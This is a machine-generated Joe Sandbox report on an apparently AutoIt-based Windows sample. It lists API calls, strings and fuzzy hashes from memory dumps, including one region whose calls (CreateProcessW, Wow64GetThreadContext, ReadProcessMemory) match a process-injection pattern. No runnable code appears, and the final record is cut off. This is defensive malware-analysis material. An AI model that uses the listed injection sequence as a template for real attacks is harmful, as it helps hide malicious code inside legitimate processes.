                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
                    • String ID: Line:
                    • API String ID: 3942752672-1585850449
                    • Opcode ID: bf5af0bf90f14a34841ef08bd9655a6f517ed9c5136c0d624c3acc2bc676e6c6
                    • Instruction ID: 2628931ddcfb88b6478c5c6e3b171877eaae7ae0d3eb18496bcb78031ef52f7b
                    • Opcode Fuzzy Hash: bf5af0bf90f14a34841ef08bd9655a6f517ed9c5136c0d624c3acc2bc676e6c6
                    • Instruction Fuzzy Hash: 5431C471008305AAD771FB60DC45BDB77EAAF45304F10471EF185921A1EF789648C79B
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                    • String ID:
                    • API String ID: 1559183368-0
                    • Opcode ID: cbc132a2d90f1fa170c901e77712e707e3c45fd9b9f6dd10e42efcbbdaed9f46
                    • Instruction ID: 3e8af1fbcd9361f7458b79431a60e62683a26ccc3b3291ab08ec2dd4872322cf
                    • Opcode Fuzzy Hash: cbc132a2d90f1fa170c901e77712e707e3c45fd9b9f6dd10e42efcbbdaed9f46
                    • Instruction Fuzzy Hash: C3519371A00B05DBDB24EF6988806AE77A7AF42320F648629F827A62E0D770DD518F40
                    APIs
                    • CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,006D758C,80070057,?,?,?,006D799D), ref: 006D766F
                    • ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,006D758C,80070057,?,?), ref: 006D768A
                    • lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,006D758C,80070057,?,?), ref: 006D7698
                    • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,006D758C,80070057,?), ref: 006D76A8
                    • CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,006D758C,80070057,?,?), ref: 006D76B4
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: From$Prog$FreeStringTasklstrcmpi
                    • String ID:
                    • API String ID: 3897988419-0
                    • Opcode ID: 687c36255a2caaa08610ba64e306fc378f6c1971270604e819e68684d509703a
                    • Instruction ID: 8e18d6b80ce70df25cd6fbc04362f2d68ebd72b9e8c301bb54ad23e3400bac22
                    • Opcode Fuzzy Hash: 687c36255a2caaa08610ba64e306fc378f6c1971270604e819e68684d509703a
                    • Instruction Fuzzy Hash: E6017172A01614EBDB209F58DC44AAA7BAEEB44751F14812AFD04D2311FB35DE4197A0
                    APIs
                      • Part of subcall function 00684F3D: LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,007462F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00684F6F
                    • _free.LIBCMT ref: 006BE68C
                    • _free.LIBCMT ref: 006BE6D3
                      • Part of subcall function 00686BEC: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00686D0D
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: _free$CurrentDirectoryLibraryLoad
                    • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                    • API String ID: 2861923089-1757145024
                    • Opcode ID: 153ee1233034de3cfb234ec54a2f4ce339ffd012ce44edd881f9980a75f9ac44
                    • Instruction ID: fceab8e7c0dea1a0ba174571937e70b8927c4b154fb91c3b9c5649f11a210c1e
                    • Opcode Fuzzy Hash: 153ee1233034de3cfb234ec54a2f4ce339ffd012ce44edd881f9980a75f9ac44
                    • Instruction Fuzzy Hash: 26919CB1910219EFCF14EFA4C8819EDB7B6FF19304F10452EF816AB291EB31A945CB64
                    APIs
                    • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,006835A1,SwapMouseButtons,00000004,?), ref: 006835D4
                    • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,006835A1,SwapMouseButtons,00000004,?,?,?,?,00682754), ref: 006835F5
                    • RegCloseKey.KERNELBASE(00000000,?,?,006835A1,SwapMouseButtons,00000004,?,?,?,?,00682754), ref: 00683617
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: CloseOpenQueryValue
                    • String ID: Control Panel\Mouse
                    • API String ID: 3677997916-824357125
                    • Opcode ID: 33e229733c18c78f5fe6e01822f3c400a5bd0778d25632012a502c4b3309a213
                    • Instruction ID: 13b56e7510382098fbec269d9754521d507d996dee37d3ffc1866670da4e22cf
                    • Opcode Fuzzy Hash: 33e229733c18c78f5fe6e01822f3c400a5bd0778d25632012a502c4b3309a213
                    • Instruction Fuzzy Hash: F3114871510228FFDB209F68DC409EEB7B9EF04B40F008669E805D7310E6719E809764
                    APIs
                    • CreateProcessW.KERNELBASE(?,00000000), ref: 03681A5B
                    • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 03681AF1
                    • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 03681B13
                    Memory Dump Source
                    • Source File: 00000000.00000002.1674262971.0000000003680000.00000040.00001000.00020000.00000000.sdmp, Offset: 03680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: Process$ContextCreateMemoryReadThreadWow64
                    • String ID:
                    • API String ID: 2438371351-0
                    • Opcode ID: 91de96a0508c6d9b88b93d6c14255c09b3dee72855056c89e06ebe7f8a996ab2
                    • Instruction ID: 66103cbd2cf4c1f6c4bcc6a2b9f639ae5619bb79c82f90f6f845bb9199ef73f6
                    • Opcode Fuzzy Hash: 91de96a0508c6d9b88b93d6c14255c09b3dee72855056c89e06ebe7f8a996ab2
                    • Instruction Fuzzy Hash: 05621934A14258DBEB24DFA4C854BDEB376EF58300F1091A9D10DEB390E77A9E81CB59
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: c9d43f29c99354b737a34d1ca6bdffb403e1309eafb7eb39f73d5c694020417c
                    • Instruction ID: 91abadd55981151d4e05f06aa44b719b1a95af415172c07c72833fce97c569a5
                    • Opcode Fuzzy Hash: c9d43f29c99354b737a34d1ca6bdffb403e1309eafb7eb39f73d5c694020417c
                    • Instruction Fuzzy Hash: 23C15B75E04216EFCB14CF94C884AAEB7B6FF48710B15859AE805EB351E730ED81DB91
                    APIs
                    • CoInitialize.OLE32(00000000), ref: 006F83D8
                    • CoUninitialize.OLE32 ref: 006F83E3
                      • Part of subcall function 006DDA5D: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 006DDAC5
                    • VariantInit.OLEAUT32(?), ref: 006F83EE
                    • VariantClear.OLEAUT32(?), ref: 006F86BF
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                    • String ID:
                    • API String ID: 780911581-0
                    • Opcode ID: 502eb78919ef828bcb1eb4df834035cff045ec927a16a73931ce051d758cd92a
                    • Instruction ID: b2107156f4efd1c7c8193da7e10caecbb47b5e2f93262cf7be8949c4cbe0e765
                    • Opcode Fuzzy Hash: 502eb78919ef828bcb1eb4df834035cff045ec927a16a73931ce051d758cd92a
                    • Instruction Fuzzy Hash: 41A16E752047059FDB50EF14C881B6AB7E6BF88314F08858DFA9A9B3A1CB30ED05CB56
                    APIs
                      • Part of subcall function 00685045: _fseek.LIBCMT ref: 0068505D
                      • Part of subcall function 006E99BE: _wcscmp.LIBCMT ref: 006E9AAE
                      • Part of subcall function 006E99BE: _wcscmp.LIBCMT ref: 006E9AC1
                    • _free.LIBCMT ref: 006E992C
                    • _free.LIBCMT ref: 006E9933
                    • _free.LIBCMT ref: 006E999E
                      • Part of subcall function 006A2F95: RtlFreeHeap.NTDLL(00000000,00000000,?,006A9C64), ref: 006A2FA9
                      • Part of subcall function 006A2F95: GetLastError.KERNEL32(00000000,?,006A9C64), ref: 006A2FBB
                    • _free.LIBCMT ref: 006E99A6
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                    • String ID:
                    • API String ID: 1552873950-0
                    • Opcode ID: fd18de759458e21508ccb8b902dfc4ac475c3880c7526805842eb646ad61b447
                    • Instruction ID: 4e8d4ad69b3cf8bed88d7b818848fd0656e87b90f43503d0051a11c150775d14
                    • Opcode Fuzzy Hash: fd18de759458e21508ccb8b902dfc4ac475c3880c7526805842eb646ad61b447
                    • Instruction Fuzzy Hash: 2D5160B1D04358AFDF649F65CC81A9EBBBAEF48300F0404AEB609A7241DB715E90CF58
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                    • String ID:
                    • API String ID: 2782032738-0
                    • Opcode ID: 14470a6213cb86a88b8286372661136e60ed3d9327b1e96cf2061ba74b92ecb7
                    • Instruction ID: 883a9e3463aba81579e3ad30ce4b5bf2b94efdf66ce5a966a98e08cde8bf112e
                    • Opcode Fuzzy Hash: 14470a6213cb86a88b8286372661136e60ed3d9327b1e96cf2061ba74b92ecb7
                    • Instruction Fuzzy Hash: A141D3306006069FDB28AEA9CC809AF77A7AFC2360B24817DE955C7644DFB09D518F44
                    APIs
                    • _memset.LIBCMT ref: 00684560
                      • Part of subcall function 0068410D: _memset.LIBCMT ref: 0068418D
                      • Part of subcall function 0068410D: _wcscpy.LIBCMT ref: 006841E1
                      • Part of subcall function 0068410D: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 006841F1
                    • KillTimer.USER32(?,00000001,?,?), ref: 006845B5
                    • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 006845C4
                    • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 006BD6CE
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                    • String ID:
                    • API String ID: 1378193009-0
                    • Opcode ID: 15d1076f3b4c691423d8cd8e16a456e905bddee462de0d4c65442b304f60e807
                    • Instruction ID: edee87369b28a3565987ba16aeed5d50c31d917c1520f353131b7f476de3e168
                    • Opcode Fuzzy Hash: 15d1076f3b4c691423d8cd8e16a456e905bddee462de0d4c65442b304f60e807
                    • Instruction Fuzzy Hash: 47213EB0904784AFEB329B24CC45BEBBBED9F01304F04019EE69D9A341DB741AC5CB56
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: _memmove
                    • String ID: AU3!P/q$EA06
                    • API String ID: 4104443479-2587288268
                    • Opcode ID: d458243787e87f72cceaf1b1f37cd1b6dd72d0aa2c08c72da2f3d158b1c00cb8
                    • Instruction ID: 840e148a5a4a9773b22eb950f2ef34758a901f7c85917c2ed29a58cf0450e25e
                    • Opcode Fuzzy Hash: d458243787e87f72cceaf1b1f37cd1b6dd72d0aa2c08c72da2f3d158b1c00cb8
                    • Instruction Fuzzy Hash: E5417C71A042599BCF21BB64C8557FE7FA7AF45300F284279FD829B282DE358D8187A1
                    APIs
                    • _memset.LIBCMT ref: 006BEE62
                    • GetOpenFileNameW.COMDLG32(?), ref: 006BEEAC
                      • Part of subcall function 006848AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,006848A1,?,?,006837C0,?), ref: 006848CE
                      • Part of subcall function 006A09D5: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 006A09F4
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: Name$Path$FileFullLongOpen_memset
                    • String ID: X
                    • API String ID: 3777226403-3081909835
                    • Opcode ID: 5e5867e07e8646f3a05b74602c566ba84afd2cb456a7702b0a194d9ba3a85ae6
                    • Instruction ID: 95daaccbd0c6c7ef5b6d7345367228b928133b147969a48e3b9871c97efee6f5
                    • Opcode Fuzzy Hash: 5e5867e07e8646f3a05b74602c566ba84afd2cb456a7702b0a194d9ba3a85ae6
                    • Instruction Fuzzy Hash: 8121C9709002589BDF51EF94C8457EE7BF99F49314F10405AE508E7241DBF8998A8F95
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: __fread_nolock_memmove
                    • String ID: EA06
                    • API String ID: 1988441806-3962188686
                    • Opcode ID: 9d43d159fe541af7851536ecf65f6eb93b7a750dffd450068b47bfbeff818fb9
                    • Instruction ID: 6aaa09988a792a83dbbdfd2b5b3caa44eea0fd52bc20db4b878fe857dfd92d6a
                    • Opcode Fuzzy Hash: 9d43d159fe541af7851536ecf65f6eb93b7a750dffd450068b47bfbeff818fb9
                    • Instruction Fuzzy Hash: 0101F9718042587EDB28D7A8C816EEE7BF89F11301F00419EF552D2181E579AA048B60
                    APIs
                    • GetTempPathW.KERNEL32(00000104,?), ref: 006E9B82
                    • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 006E9B99
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: Temp$FileNamePath
                    • String ID: aut
                    • API String ID: 3285503233-3010740371
                    • Opcode ID: b8888b113ec61a4e2cb01098cc402d2dab5403e8ef774bdb2ff26e69c3364a15
                    • Instruction ID: fc09d9d2a82abe04293c31d87c79e43df4e26fde004d2d09d8df31d605faaf12
                    • Opcode Fuzzy Hash: b8888b113ec61a4e2cb01098cc402d2dab5403e8ef774bdb2ff26e69c3364a15
                    • Instruction Fuzzy Hash: 2DD05E7954130EBBDB20AB94EC0EF9A772CE704700F0082A1FE94910A2DEB865988B95
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: faa85f51f8a419bd6c4ae4bb4db8315dc92ccc45dae097251e9d84887268e64f
                    • Instruction ID: 4929b593a7ea2a655569be976839f28108632ca1d82aa8289f6b4f6ae9d88109
                    • Opcode Fuzzy Hash: faa85f51f8a419bd6c4ae4bb4db8315dc92ccc45dae097251e9d84887268e64f
                    • Instruction Fuzzy Hash: 80F16C709083059FC754DF28C484A6ABBE6FF88314F14892EF9999B351DB31E946CF86
                    APIs
                    • _memset.LIBCMT ref: 00684401
                    • Shell_NotifyIconW.SHELL32(00000000,?), ref: 006844A6
                    • Shell_NotifyIconW.SHELL32(00000001,?), ref: 006844C3
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: IconNotifyShell_$_memset
                    • String ID:
                    • API String ID: 1505330794-0
                    • Opcode ID: 059f14fe6c57c3fd580135dd1a608b39b093940748adec6cff0ad2f1f0e2edaf
                    • Instruction ID: 71722d57e8eec9ed6dcd6df4fc01a5a750d1a695ac23d540aca05c8c559dbecc
                    • Opcode Fuzzy Hash: 059f14fe6c57c3fd580135dd1a608b39b093940748adec6cff0ad2f1f0e2edaf
                    • Instruction Fuzzy Hash: 513184B05057019FD720EF64D88479BBBE5FB49304F004A2EF59A83350EBB5A948CB96
                    APIs
                    • __FF_MSGBANNER.LIBCMT ref: 006A5963
                      • Part of subcall function 006AA3AB: __NMSG_WRITE.LIBCMT ref: 006AA3D2
                      • Part of subcall function 006AA3AB: __NMSG_WRITE.LIBCMT ref: 006AA3DC
                    • __NMSG_WRITE.LIBCMT ref: 006A596A
                      • Part of subcall function 006AA408: GetModuleFileNameW.KERNEL32(00000000,007443BA,00000104,?,00000001,00000000), ref: 006AA49A
                      • Part of subcall function 006AA408: ___crtMessageBoxW.LIBCMT ref: 006AA548
                      • Part of subcall function 006A32DF: ___crtCorExitProcess.LIBCMT ref: 006A32E5
                      • Part of subcall function 006A32DF: ExitProcess.KERNEL32 ref: 006A32EE
                      • Part of subcall function 006A8D68: __getptd_noexit.LIBCMT ref: 006A8D68
                    • RtlAllocateHeap.NTDLL(00CC0000,00000000,00000001,00000000,?,?,?,006A1013,?), ref: 006A598F
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                    • String ID:
                    • API String ID: 1372826849-0
                    • Opcode ID: a3384aad99f8d8cb47f05a92da1037398f8b527a33c041fc57e8a690fb46f839
                    • Instruction ID: 748bc32df6af6e5238d74288cb7993b23bba3250303841e7740633e46fba7e7e
                    • Opcode Fuzzy Hash: a3384aad99f8d8cb47f05a92da1037398f8b527a33c041fc57e8a690fb46f839
                    • Instruction Fuzzy Hash: 6601D235200B55DEE661BB64E842BAF729B9F43770F10002FF502AF282DF749D019E69
                    APIs
                    • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,006E97D2,?,?,?,?,?,00000004), ref: 006E9B45
                    • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,006E97D2,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 006E9B5B
                    • CloseHandle.KERNEL32(00000000,?,006E97D2,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 006E9B62
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: File$CloseCreateHandleTime
                    • String ID:
                    • API String ID: 3397143404-0
                    • Opcode ID: 16db5a3c60e8a466cdaa027b75911e26bdd70c0790814ef229a6cfd293f4d8c4
                    • Instruction ID: 918a5b3a9b5315380a064aa815af365148be01c072725824d3b2f5ef05cefb10
